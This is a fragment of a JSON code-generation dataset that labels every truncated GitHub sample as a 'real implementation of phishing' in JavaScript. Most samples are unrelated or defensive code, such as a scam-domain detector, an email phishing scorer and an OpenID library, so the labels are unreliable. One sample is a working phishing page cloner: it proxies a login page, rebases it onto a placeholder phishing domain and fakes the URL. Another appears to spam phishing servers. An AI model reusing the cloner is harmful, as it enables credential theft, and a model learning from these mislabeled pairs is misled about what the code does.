[\"Howard Yeend\"],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"http:\/\/www.puremango.co.uk\/cm_breaking_captcha_115.php\"\n\t},\n\t\"chafee\": {\n\t\t\"title\": \"17 USC 121, Limitations on exclusive rights: reproduction for blind or other people with disabilities (also known as the Chafee Amendment)\",\n\t\t\"date\": \"\",\n\t\t\"authors\": [],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"https:\/\/www.copyright.gov\/title17\/92chap1.html\"\n\t},\n \"captcha-ocr\": {\n\t\"title\": \"CAPTCHA: Attacks and Weaknesses against OCR technology\",\n\t\"date\": \"2013\",\n\t\"authors\": [\n\t \"Silky Azad\", \"Kiran Jain\"],\n\t\"publisher\": \"Journal of Computer science and Technology\",\n\t\"etAl\": false,\n\t\"editors\": [],\n\t\"href\": \"https:\/\/computerresearch.org\/index.php\/computer\/article\/download\/368\/368\"\n },\n \"information-security\": {\n\t\"ti",
67
+ "language":"Javascript",
68
+ "repo_name":"w3c\/apa",
69
+ "timestamp":"2025-05-22T22:01:01.006796",
70
+ "split":"training"
71
+ },
72
+ {
73
+ "task":"code_generation",
74
+ "problem_title":"phishing in Javascript",
75
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
76
+ "sample_solution":"'use strict';\n\nconst fs = require('fs-extra');\nconst debug = require('debug')('app');\nconst express = require('express');\nconst csp = require('express-csp-header');\nconst frameguard = require('frameguard');\nconst xssFilter = require('x-xss-protection');\nconst bodyParser = require('body-parser');\nconst url = require('url');\nconst dateFormat = require('dateformat');\nconst {fork} = require('child_process');\nconst download = require('download-file');\nconst rimraf = require('rimraf');\nconst phishingDetector = require('eth-phishing-detect\/src\/detector');\nconst crypto = require(\"crypto\");\nconst request = require('request');\nconst app = express();\nconst config = require('.\/config');\nconst check = require('.\/_utils\/webcheck.js');\nconst lookup = require('.\/_utils\/lookup.js');\n\n\nlet default_template = fs.readFileSync('.\/_layouts\/default.html', 'utf8');\nlet cache;\nlet updating_now = false;\nlet icon_warnings = [];\nvar older_cache_time;\n\n\nif('perform_dns_lookup' in config && config.perform_dns_lookup === false) {\n default_template = default_template.replace(\"{{ config.perform_dns_lookup }}\", \"<div class='ui info message'>DNS lookups not performed due to configuration.<\/div><br \/>\");\n} else {\n default_template = default_template.replace(\"{{ config.perform_dns_lookup }}\", '');\n}\n\n\/* See if there's an up-to-date cache, otherwise run `update.js` to create one. *\/\nfunction getCache(callback = false) {\n if (!fs.existsSync('_cache\/cache.json')) {\n debug(\"No cache file found. Creating one...\");\n if (callback) {\n if (!updating_now) {\n updating_now = true;\n fork('update.js');\n }\n var checkDone = setInterval(function() {\n if (fs.existsSync('_cache\/cache.json')) {\n updating_now = false;\n cache = JSON.parse(fs.readFileSync('_cache\/cache.json'));\n clearInterval(checkDone);\n debug(\"Successfully updated cache!\");\n ",
77
+ "language":"Javascript",
78
+ "repo_name":"MrLuit\/EtherScamDB",
79
+ "timestamp":"2025-05-22T22:01:01.099275",
80
+ "split":"training"
81
+ },
82
+ {
83
+ "task":"code_generation",
84
+ "problem_title":"phishing in Javascript",
85
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
86
+ "sample_solution":"\/**\n * Github\n * https:\/\/github.com\/6IX7ine\/certstreamcatcher\n * \n * Copyright (c) 2017 F\u00e1bio Castro\n * Licensed under the MIT license.\n *\/\n\n 'use strict'\n\n const tld = require('tldjs');\n const lodash = require('lodash');\n const color = require('cli-color');\n const status = require('node-status');\n const punycode = require('punycode');\n\n const yellow = color.yellow.underline;\n const danger = color.redBright.underline;\n const white = color.white.underline;\n\n const certificates = status.addItem('certificates');\n\n const mapping = {\n\n \"a\": [\"\u00e0\", \"\u00e1\", \"\u00e2\", \"\u00e3\", \"\u00e4\", \"\u00e5\", \"\u0101\", \"\u0103\", \"\u0105\", \"\u01ce\", \"\u0201\", \"\u0203\", \"\u0227\", \"\u1e01\", \"\u1e9a\", \"\u1ea1\"],\n \"b\": [\"\u1e03\", \"\u1e05\", \"\u1e07\", \"\u0180\"],\n \"c\": [\"\u00e7\", \"\u0107\", \"\u0109\", \"\u010b\", \"\u010d\"],\n \"d\": [\"\u1e0b\", \"\u1e0d\", \"\u1e0f\", \"\u1e11\", \"\u1e13\", \"\u0111\"],\n \"e\": [\"\u00e8\", \"\u00e9\", \"\u00ea\", \"\u00eb\", \"\u0115\", \"\u0117\", \"\u0119\", \"\u011b\", \"\u0205\", \"\u0207\", \"\u0229\", \"\u1e19\", \"\u1e1b\", \"\u1eb9\", \"\u1ebd\"],\n \"f\": [\"\u1e1f\"],\n \"g\": [\"\u011d\", \"\u011f\", \"\u0121\", \"\u0123\", \"\u01e7\", \"\u01f5\", \"\u1e21\"],\n \"h\": [\"\u0125\", \"\u021f\", \"\u1e23\", \"\u1e25\", \"\u1e27\", \"\u1e29\", \"\u1e2b\", \"\u1e96\"],\n \"i\": [\"\u00ec\", \"\u00ed\", \"\u00ee\", \"\u00ef\", \"\u0129\", \"\u012b\", \"\u012d\", \"\u012f\", \"\u01d0\", \"\u0209\", \"\u020b\", \"\u1e2d\", \"\u1ecb\"],\n \"j\": [\"\u0135\", \"\u01f0\"],\n \"k\": [\"\u0137\", \"\u01e9\", \"\u1e31\", \"\u1e33\", \"\u1e35\"],\n \"l\": [\"\u013a\", \"\u013c\", \"\u013e\", \"\u0140\", \"\u1e37\", \"\u1e3b\", \"\u1e3d\", \"\u03b9\", \"\u0142\"],\n \"m\": [\"\u1e3f\", \"\u1e41\", \"\u1e43\", \"\u03fb\"],\n \"n\": [\"\u00f1\", \"\u0144\", \"\u0146\", \"\u0148\", \"\u0149\", \"\u01f9\", \"\u1e45\", \"\u1e47\", \"\u1e49\", \"\u1e4b\"],\n \"o\": [\"\u00f2\", \"\u00f3\", \"\u00f4\", \"\u00f5\", \"\u00f6\", \"\u014d\", \"\u014f\", \"\u0151\", \"\u01a1\", \"\u01d2\", \"\u01eb\", \"\u1ed1\", \"\u020d\", \"\u020f\", \"\u022f\", \"\u1ecd\", \"\u00f8\", \"\u1ed9\"],\n \"p\": [\"\u1e55\", \"\u1e57\", \"\u03f8\"],\n \"r\": [\"\u0155\", \"\u0157\", \"\u0159\", \"\u0211\", \"\u0213\", \"\u1e59\", \"\u1e5b\", \"\u1e5f\", \"\u0491\"],\n \"s\": [\"\u015d\", \"\u015f\", \"\u0161\", \"\u0219\", \"\u1e61\", \"\u1e63\"],\n \"t\": [\"\u0163\", \"\u0165\", \"\u021b\", \"\u1e6b\", \"\u1e6d\", \"\u1e6f\", \"\u1e71\", \"\u1e97\"],\n \"u\": [\"\u00f9\", \"\u00fa\", \"\u00fb\", \"\u00fc\", \"\u0169\", \"\u016b\", \"\u016d\", \"\u016f\", \"\u0171\", \"\u0173\", \"\u01b0\", \"\u01d4\", \"\u0215\", \"\u0217\", \"\u1e73\", \"\u1e75\", \"\u1e77\", \"\u1ee5\"],\n \"v\": [\"\u1e7d\", \"\u1e7f\"],\n \"w\": [\"\u0175\", \"\u1e81\", \"\u1e83\", \"\u1e85\", \"\u1e87\", \"\u1e89\", \"\u1e98\"],\n \"x\": [\"\u1e8b\", \"\u1e8d\"],\n \"y\": [\"\u00fd\", \"\u00ff\", \"\u0177\", \"\u0233\", \"\u1e8f\", \"\u1e99\", \"\u1ef3\", \"\u1ef5\", \"\u1ef9\"],\n \"z\": [\"\u017a\", \"\u017c\", \"\u017e\", \"\u1e91\", \"\u1e93\", \"\u1e95\"]\n}\n\n module.exports = {\n\n \tcertstreamClientPhishing: function (certstream, regex, tlds, options) {\n\n \t\tthis.certstream = certstream;\n \t\tthis.regex = regex;\n \t\tthis.tlds = tlds;\n\n\n \t\tlet settings = { tlds: false };\n\n \t\tif (!op",
87
+ "language":"Javascript",
88
+ "repo_name":"jimywork\/certstreamcatcher",
89
+ "timestamp":"2025-05-22T22:01:01.244357",
90
+ "split":"training"
91
+ },
92
+ {
93
+ "task":"code_generation",
94
+ "problem_title":"phishing in Javascript",
95
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
96
+ "sample_solution":"\/\/ Redirecting to links from the book:\n\/\/ https:\/\/nooffice.link\/REDIRECT\n\/\/ which translates to https:\/\/nooffice.org\/redirect?to=REDIRECT\n\nlet links = new Map([\n\n\/\/list of REDIRECT links\n['nooffice', 'https:\/\/nooffice.org'],\n\n\n\/\/chapter 19\n['ocr', 'https:\/\/en.wikipedia.org\/wiki\/Optical_character_recognition'],\n['evernote','https:\/\/Evernote.com'],\n['swiftscan', 'https:\/\/swiftscan.app\/en\/index.html'],\n['ios-scan', 'https:\/\/support.apple.com\/en-us\/HT210336'],\n['dropbox', 'https:\/\/www.dropbox.com'],\n['box', 'https:\/\/box.com'],\n['gdrive', 'https:\/\/drive.google.com'],\n['onedrive', 'https:\/\/www.microsoft.com\/en-us\/microsoft-365\/onedrive\/online-cloud-storage'],\n['iwork', 'https:\/\/www.apple.com\/iwork\/'],\n['gsheets', 'https:\/\/www.google.com\/sheets\/about\/'],\n['excel', 'https:\/\/www.microsoft.com\/en-us\/microsoft-365\/excel'],\n['mfa', 'https:\/\/en.wikipedia.org\/wiki\/Multi-factor_authentication'],\n['messages', 'https:\/\/support.apple.com\/explore\/messages'],\n['signal', 'https:\/\/www.signal.org'],\n['telegram', 'https:\/\/telegram.org'],\n['whatsapp', 'https:\/\/www.whatsapp.com'],\n['ipadonly', 'https:\/\/ipadonly.com\/book\/'],\n['vpn', 'https:\/\/en.wikipedia.org\/wiki\/Virtual_private_network'],\n['github', 'https:\/\/nooffice.org\/why-in-any-company-you-should-be-using-version-control-for-anything-how-we-use-github-not-only-bc2554308455\/'],\n\n\/\/chapter 20\n\n['conversation', 'https:\/\/en.wikipedia.org\/wiki\/A_Little_Less_Conversation'],\n['slack', 'https:\/\/slack.com'],\n['msteams', 'https:\/\/www.microsoft.com\/en-us\/microsoft-365\/microsoft-teams\/group-chat-software'],\n['cognitive', 'https:\/\/www.pnas.org\/content\/106\/37\/15583'], \n['digital-minimalism', 'https:\/\/www.calnewport.com\/books\/digital-minimalism\/'],\n\n\/\/chapter 21\n['offices', 'https:\/\/sliwinski.com\/tag\/office'],\n['cabinet', 'https:\/\/sliwinski.com\/declutter-your-desk-why-i-love-my-clutter-fre\/'],\n['stand', 'https:\/\/michael.team\/myoffice\/'],\n['whiteboard', 'https:\/\/sliwinski.com\/whiteboard\/'],\n\n\/\/chapter 22\n\n\n\/\/chapter 23\n['basecamphires', 'https:\/\/m.signa",
97
+ "language":"Javascript",
98
+ "repo_name":"Nozbe\/NoOffice.org",
99
+ "timestamp":"2025-05-22T22:01:01.359520",
100
+ "split":"training"
101
+ },
102
+ {
103
+ "task":"code_generation",
104
+ "problem_title":"phishing in Javascript",
105
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
106
+ "sample_solution":"\/* OpenID for node.js\n *\n * http:\/\/ox.no\/software\/node-openid\n * http:\/\/github.com\/havard\/node-openid\n *\n * Copyright (C) 2010 by H\u00e5vard Stranden\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and\/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n *\n * -*- Mode: JS; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- \n * vim: set sw=2 ts=2 et tw=80 : \n *\/\n\nconst { access } = require('fs');\n\nvar Buffer = require('buffer').Buffer,\n crypto = require('crypto'),\n http = require('.\/http'),\n querystring = require('querystring'),\n url = require('url'),\n xrds = require('.\/lib\/xrds');\n\nvar _associations = {};\nvar _discoveries = {};\nvar _nonces = {};\n\nvar AX_MAX_VALUES_COUNT = 1000;\n\nvar openid = exports;\n\nvar _get = http.get;\nvar _post = http.post;\n\nfunction hasOwnProperty(obj, prop) {\n return Object.prototype.hasOwnProperty.call(obj, prop);\n}\n\nopenid.RelyingParty = function (returnUrl, realm, stateless, strict, extensions) {\n this.returnUrl = returnUrl;\n this.realm = realm || null;\n this.stateless = stateless;\n this.str",
107
+ "language":"Javascript",
108
+ "repo_name":"havard\/node-openid",
109
+ "timestamp":"2025-05-22T22:01:01.483356",
110
+ "split":"training"
111
+ },
112
+ {
113
+ "task":"code_generation",
114
+ "problem_title":"phishing in Javascript",
115
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
116
+ "sample_solution":"\/\/If container already in DOM, remove it\nif(report.length > 0) report.remove();\n\n\/\/Container report\n\/*report = $('<div id=\"report\">\\\n\t\t\t<textarea id=\"reportv\" maxlength=\"150\" placeholder=\"Attention, les signalements abusifs, sans int\u00e9r\u00eat ou encore pour dire merci seront passible de sanction allant d\\'un simple avertissement au ban.\"><\/textarea>\\\n\t\t\t<\/div>');*\/\n\n\t\n\tbody.append('<div id=report> <\/div>');\n\t\n\treport = cacheSel('#report');\n\t\n\t\/\/Container, select subject \/ textarea \n\treport.html('<p>Selectionner le sujet de votre signalement<\/p>\\\n\t\t\t\t<ul>\\\n\t\t\t\t\t <li id=reDead><i class=\"fa fa-unlink\"> Liens morts<\/i><\/li>\\\n\t\t\t\t\t <li id=reForb><i class=\"fa fa-ban\"> Hors charte<\/i><\/li>\\\n\t\t\t\t\t <li id=reMove><i class=\"fa fa-share\"> A d\u00e9placer<\/i><\/li>\\\n\t\t\t\t\t <li id=reSecu><i class=\"fa fa-crosshairs\"> Virus\/Trojan\/Scam...<\/i><\/li>\\\n\t\t\t\t\t <li id=reHate><i class=\"fa fa-globe\"> Insulte envers un peuple\/religion\/minorit\u00e9...<\/i><\/li>\\\n\t\t\t\t\t <li id=rePers><i class=\"fa fa-eye-slash\"> Violation vie priv\u00e9e<\/i><\/li>\\\n\t\t\t\t\t <li id=reProt><i class=\"fa fa-child\"> Contenu p\u00e9dophile<\/i><\/li>\\\n\t\t\t\t\t <li id=reOthr><i class=\"fa fa-random\"> R\u00e9ouverture, r\u00e9solu, autres...<\/i><\/li>\\\n\t\t\t\t<\/ul>\\\n\t\t\t\t<textarea id=reportv placeholder=\"default\"><\/textarea>');\n\t\n\t\/\/Refresh caching\n\treport = cacheSel('#report');\n\treportv = cacheSel('#reportv');\n\t\n\t\/\/Hide the reportv until a subject get select\n\treportv.hide();\n\n\t\/\/Get 80% in px\n\tvar sizecal = $(window).width() * 0.8;\n\t\n\t\/\/Max width\n\tif(parseInt(sizecal) > 600) var sizecal = 600;\n\n\t\/\/Pop the container vote\n\treport.dialog({\n\t\twidth:sizecal,\n\t\tmodal:true,\n\t\tresizable: true,\n\t\ttitle:'Signalement',\n\t\tdialogClass:'modalNinja',\n\t\tshow:{effect:'scale', duration: 320},\n\t\tbuttons: [{\n\t\t\ttext: 'Confirmation',\n\t\t\tclick: function() {\n\n\t\t\t\t\/\/Subject \n\t\t\t\treps = reportv.attr('class'); \n\t\t\t\t\t\n\t\t\t\t\/\/Value textarea\n\t\t\t\trept = reportv.val();\n\t\t\t\t\n\t\t\t\t\/\/Less 10 chars return\n\t\t\t\tif(rept.length < 10) {\n\t\t\t\t\tcoloredInput(reportv,'errorSe','Minimum 10 caract\u00e8res');\n\t\t\t\t\treturn;\n",
117
+ "language":"Javascript",
118
+ "repo_name":"Anyon3\/ninjacms",
119
+ "timestamp":"2025-05-22T22:01:01.680023",
120
+ "split":"training"
121
+ },
122
+ {
123
+ "task":"code_generation",
124
+ "problem_title":"phishing in Javascript",
125
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
126
+ "sample_solution":"\/**\n * Created by IntelliJ IDEA.\n * User: Altryne\n * Date: Nov 20, 2010\n * Time: 4:55:41 AM\n * To change this template use File | Settings | File Templates.\n *\/\n\nvar intervall = 0;\n can_run_apps = false,\n folder_open = false,\n tick = '',\n doubleclickthreshhold = 200,\n isDblClick = false,\n canScroll = true,\n active_app = '';\n\n$('.page .delete,#dock .delete').live('click', function(event) {\n event.stopPropagation();\n event.stopImmediatePropagation();\n if(confirm('Are you sure you want to delete this app from you iPad?')){\n $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();\n $(this).siblings('.app_logo')\n .stop()\n .css('position','absolute')\n .animate({left:\"50%\",width:1,top:\"50%\",height: 1},'easeInQuint',function(){$(this).parent().remove()})\n }\n});\n$('#multitask_bar .delete').live('mousedown ', function(event) {\n event.stopPropagation();\n event.stopImmediatePropagation();\n $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide();\n $(this).siblings('.app_logo')\n .stop()\n .css('position','absolute')\n .animate({left:\"50%\",width:1,top:\"50%\",height: 1},'easeInQuint',function(){\n _id = $(this).parent().attr('id');\n $('#'+_id+'_app').remove();\n $(this).parent().remove();\n if(!$('#multitask_bar li').length){\n closeMultitask(200);\n }\n })\n});\n\n$('.page.apps>li,#dock li').live('mousedown mouseup', function(event) {\n if (event.type == 'mousedown') {\n $(this).addClass('mousedown');\n if (!$('#drag').is('.ui-draggable-dragging') && !$('body').is('.editMode')) {\n can_run_apps = true;\n intervall = setTimeout(edit_mode, '1000');\n }else if($(this).hasClass('folder') && $('body').is('.editMode')){\n openFolder($(this).attr('id",
127
+ "language":"Javascript",
128
+ "repo_name":"altryne\/Ipad-Simulator",
129
+ "timestamp":"2025-05-22T22:01:01.825080",
130
+ "split":"training"
131
+ },
132
+ {
133
+ "task":"code_generation",
134
+ "problem_title":"phishing in Javascript",
135
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
136
+ "sample_solution":"\/*\r\n * Copyright (c) 2021, Atheropids. All rights reserved.\r\n * \r\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n * SOFTWARE.\r\n *\/\r\n\r\n'use strict';\r\n\r\nconst https = require('https');\r\nconst readline = require('readline');\r\nconst tough = require('tough-cookie');\r\n\r\n\/\/ Spec holder class. Please see comments of member variables for details.\r\nclass PhishingServer {\r\n constructor(__domain, __entry_path = '\/', __login_page = '\/home\/login', __login_inbox = '\/login\/dologin') {\r\n\r\n \/\/ Target C&C server domain name.\r\n this.target_domain = __domain;\r\n\r\n \/\/ Remote path for server cookie init.\r\n this.entry_path = __entry_path;\r\n\r\n \/\/ Remote path of the phishing page.\r\n this.phishing_page_path = __login_page;\r\n\r\n \/\/ Remote path of the phishing data receiver.\r\n this.phishing_target_path = __login_inbox;\r\n }\r\n}\r\n\r\n\/*\r\n * Settings are here c:\r\n * Modify them on your purpose.\r\n *\/\r\n\r\n\/\/ List of malicious servers.\r\nlet spam_targets = [\r\n \/\/ [seized operation] new PhishingServer('steamcomrninuty.ru'),\r\n \/\/ [seized operation] new PhishingServer('steamcommnunmity.com', '\/id\/zxayonax'),\r\n \/\/ [seized operation] new PhishingServer('nitro-discord.ru', '\/airdrop'),\r\n \/\/ [seized operation] new PhishingServer('steamcommunity.link'),\r\n \/\/ [seized operation] new PhishingServer('discorcl.link'),\r\n new PhishingServer('steamcommmunilty.com', '\/tradoffer\/new\/?partner=406482431&token=lfk938iK'),\r\n new PhishingServer('discorrd.ru'),\r\n new PhishingServer('free-nitroos.ru'),\r\n new PhishingServer('discod.info', '\/nitro-gift'),\r\n new PhishingServer('d",
137
+ "language":"Javascript",
138
+ "repo_name":"Atheropids\/SteamComrninuty-Phish-Spammer",
139
+ "timestamp":"2025-05-22T22:01:02.005822",
140
+ "split":"training"
141
+ },
142
+ {
143
+ "task":"code_generation",
144
+ "problem_title":"phishing in Javascript",
145
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
146
+ "sample_solution":"module.exports = [\n '2015',\n '2016',\n '2017',\n '2018',\n '2019',\n '2020',\n 'abuse',\n 'academy',\n 'accessibility',\n 'account',\n 'accountant',\n 'accounting',\n 'accountmanager',\n 'accountmanagers',\n 'accounts',\n 'accountspayable',\n 'acquisition',\n 'admin',\n 'admin1',\n 'administracao',\n 'administracion',\n 'administrador',\n 'administratie',\n 'administratif',\n 'administration',\n 'administrativo',\n 'administrator',\n 'administrators',\n 'admins',\n 'adminteam',\n 'admissions',\n 'adops',\n 'ads',\n 'adventure',\n 'advertise',\n 'advertising',\n 'advertisingsales',\n 'advice',\n 'advisor',\n 'advisors',\n 'adwords',\n 'affiliate',\n 'affiliates',\n 'agence',\n 'agencia',\n 'agency',\n 'agents',\n 'alarm',\n 'alarms',\n 'alert',\n 'alerts',\n 'alexa',\n 'all',\n 'all-employees',\n 'all-pms',\n 'all-staff',\n 'all-team',\n 'all-users',\n 'all.employees',\n 'all.staff',\n 'all.users',\n 'all_staff',\n 'alla',\n 'alle',\n 'allemployees',\n 'allhands',\n 'allsales',\n 'allstaff',\n 'allstudents',\n 'allteachers',\n 'allteam',\n 'allusers',\n 'alpha',\n 'alphas',\n 'alumni',\n 'ambassadors',\n 'amministrazione',\n 'analysts',\n 'analytics',\n 'android',\n 'angels',\n 'animation',\n 'announce',\n 'announcements',\n 'ap',\n 'api',\n 'app',\n 'apple',\n 'application',\n 'applications',\n 'apply',\n 'appointments',\n 'apps',\n 'archives',\n 'asistente',\n 'asset',\n 'assistanthead',\n 'assistencia',\n 'assistenza',\n 'associates',\n 'associates-all',\n 'ateam',\n 'atencionalcliente',\n 'atendimento',\n 'auctions',\n 'available',\n 'backend',\n 'backend-dev',\n 'backup',\n 'bd',\n 'benefits',\n 'berlin',\n 'bestellung',\n 'beta',\n 'biblioteca',\n 'bibliotheque',\n 'billing',\n 'bills',\n 'biuro',\n 'biz',\n 'bizdev',\n 'blog',\n 'board',\n 'bod',\n 'bookclub',\n 'booking',\n 'bookings',\n 'boston',\n 'boxoffice',\n 'brand',\n 'branding',\n 'brands',\n 'brandsolutions',\n 'broadcast',\n 'buchhaltung',\n 'bugs',\n 'build',\n 'bursar',\n 'busdev',\n 'business',",
147
+ "language":"Javascript",
148
+ "repo_name":"decal\/werdlists",
149
+ "timestamp":"2025-05-22T22:01:02.114023",
150
+ "split":"training"
151
+ },
152
+ {
153
+ "task":"code_generation",
154
+ "problem_title":"phishing in Javascript",
155
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
156
+ "sample_solution":"page_src = \"https:\/\/login.vulnwebsite.com\/\";\nphishing_url=\"http:\/\/yourphishingdomain.com\/\";\n\nfunction doHTMLMagic(pageSource, baseURL, phishDomain) {\n\treplaceSrc = pageSource.replace('href=\"\/', \"href=\\\"\" + baseURL+ '\/');\n\treplaceSrc = replaceSrc.replace('src=\"\/', \"src=\\\"\" + baseURL+ '\/');\n\treplaceSrc = replaceSrc.replace('<head>', '<head><base href=\"' + phishDomain + '\">');\n\treturn replaceSrc;\n}\n\nfunction createCORSRequest(method, url) {\n var xhr = new XMLHttpRequest();\n if (\"withCredentials\" in xhr) {\n xhr.open(method, url, true);\n } else if (typeof XDomainRequest != \"undefined\") {\n xhr = new XDomainRequest();\n xhr.open(method, url);\n } else {\n xhr = null;\n }\n return xhr;\n}\n\nfunction makeCorsRequest(baseURL, phishDomain) {\n var url = 'https:\/\/cors-anywhere.herokuapp.com\/' + baseURL;\n\n var xhr = createCORSRequest('GET', url);\n if (!xhr) {\n return;\n }\n\n xhr.onload = function() {\n var pageSourceStr = doHTMLMagic(xhr.responseText, baseURL, phishDomain)\n \tdocument.open();\n document.write(pageSourceStr);\n document.close();\n };\n\n xhr.send();\n}\n\nmakeCorsRequest(page_src, phishing_url);\nwindow.history.pushState(\"\", \"Login\", \"\/login\");",
157
+ "language":"Javascript",
158
+ "repo_name":"infosec-au\/phishJS",
159
+ "timestamp":"2025-05-22T22:01:02.254176",
160
+ "split":"training"
161
+ },
162
+ {
163
+ "task":"code_generation",
164
+ "problem_title":"phishing in Javascript",
165
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
166
+ "sample_solution":"const { Builder, By, until, Capabilities } = require(\"selenium-webdriver\")\nconst chrome = require(\"selenium-webdriver\/chrome\")\nconst url = require(\"url\")\nconst fs = require(\"fs\")\nconst crypto = require(\"crypto\")\nconst request = require(\"request\")\nconst path = require(\"path\")\nconst FormData = require(\"form-data\")\nconst proxy = require(\"selenium-webdriver\/proxy\")\nconst proxyChain = require(\"proxy-chain\")\nrequire('console-stamp')(console, {\n format: ':date(yyyy\/mm\/dd HH:MM:ss.l)'\n})\nrequire(\"dotenv\").config()\n\nconst extensionId = \"caacbgbklghmpodbdafajbgdnegacfmo\"\nconst CRX_URL = `https:\/\/clients2.google.com\/service\/update2\/crx?response=redirect&prodversion=98.0.4758.102&acceptformat=crx2,crx3&x=id%3D${extensionId}%26uc&nacl_arch=x86-64`\nconst USER_AGENT =\n \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.102 Safari\/537.36\"\n\nconst USER = process.env.APP_USER || \"\"\nconst PASSWORD = process.env.APP_PASS || \"\"\nconst ALLOW_DEBUG = !!process.env.DEBUG?.length || false\nconst EXTENSION_FILENAME = \"app.crx\"\nconst PROXY = process.env.PROXY || undefined\n\nconsole.log(\"-> Starting...\")\nconsole.log(\"-> User:\", USER)\nconsole.log(\"-> Pass:\", PASSWORD)\nconsole.log(\"-> Proxy:\", PROXY)\nconsole.log(\"-> Debug:\", ALLOW_DEBUG)\n\nif (!USER || !PASSWORD) {\n console.error(\"Please set APP_USER and APP_PASS env variables\")\n process.exit()\n}\n\nif (ALLOW_DEBUG) {\n console.log(\n \"-> Debugging is enabled! This will generate a screenshot and console logs on error!\"\n )\n}\n\nasync function downloadExtension(extensionId) {\n const url = CRX_URL.replace(extensionId, extensionId)\n const headers = { \"User-Agent\": USER_AGENT }\n\n console.log(\"-> Downloading extension from:\", url)\n\n \/\/ if file exists and modify time is less than 1 day, skip download\n if (fs.existsSync(EXTENSION_FILENAME) && fs.statSync(EXTENSION_FILENAME).mtime > Date.now() - 86400000) {\n console.log(\"-> Extension already downloaded! skip download...\")\n return\n }\n\n return new ",
167
+ "language":"Javascript",
168
+ "repo_name":"web3bothub\/gradient-bot",
169
+ "timestamp":"2025-05-22T22:01:02.390815",
170
+ "split":"training"
171
+ },
172
+ {
173
+ "task":"code_generation",
174
+ "problem_title":"phishing in Javascript",
175
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
176
+ "sample_solution":"const SCALES = { URGENCY: 5, CONFRIM: 6 };\nconst TOTALSCALE = 20;\nconst THRESH = 0.33;\n\nfunction emailCheck(email) {\n let scale = 0;\n let idx = email.lastIndexOf(\"@\");\n id = email.slice(0, idx);\n dmn = email.slice(idx + 1);\n len1 = id.length;\n len2 = dmn.length;\n \/\/ Check Email ID for Number Count >= 3\n idNums = id.replace(\/\\D\/g, \"\");\n if (idNums && idNums.length >= 3) scale += 2;\n \/\/ Check Email Domain for Number Count > 0\n dmnNums = dmn.replace(\/\\D\/g, \"\");\n if (dmnNums && dmnNums.length > 0) scale += 2;\n \/\/ Check Email Domain for Common Domain\n let found = DOMAINS.find(d => d === dmn);\n if (!found) scale += 1;\n return scale;\n}\n\nfunction URLcheck(body) {\n url = body.match(\n \/[-a-zA-Z0-9@:%._\\+~#=]{1,256}\\.[a-zA-Z0-9()]{1,6}\\b([-a-zA-Z0-9()@:%_\\+.~#?&\/\/=]*)\/\n );\n if (url) return 2;\n return 0;\n}\n\nfunction greetingCheck(greeting) {\n let scale = 0;\n for (i = 0; i < 3; i++) {\n let found = GREETINGS.find(greet => greeting[i] === greet);\n if (found) scale += 1;\n if (scale > 1) return 2;\n }\n return scale;\n}\n\nfunction urgencyCheck(word) {\n let found = URGENCY_WORDS.find(w => w === word);\n if (found) return 5 \/ 3;\n return 0;\n}\n\nfunction confirmCheck(word) {\n let found = CONFIRMING_WORDS.find(w => w === word);\n if (found) return 2;\n return 0;\n}\n\nfunction dictionaryCheck(body) {\n body = body\n .replace(\/[.,'\\\/#!$%\\^&\\*;:{}=\\-_`~()]\/g, \"\")\n .replace(\/\\r?\\n|\\r\/g, \" \"); \/\/ Remove special chars\n let words = body.split(\" \");\n words = words.filter(w => Boolean(w)); \/\/Remove falsey values\n let greeting = words.splice(0, 3);\n let grtScale = greetingCheck(greeting);\n let urgScale = 0;\n let cfmScale = 0;\n words.forEach(word => {\n if (urgScale < SCALES.URGENCY) urgScale += urgencyCheck(word);\n if (cfmScale < SCALES.CONFRIM) cfmScale += 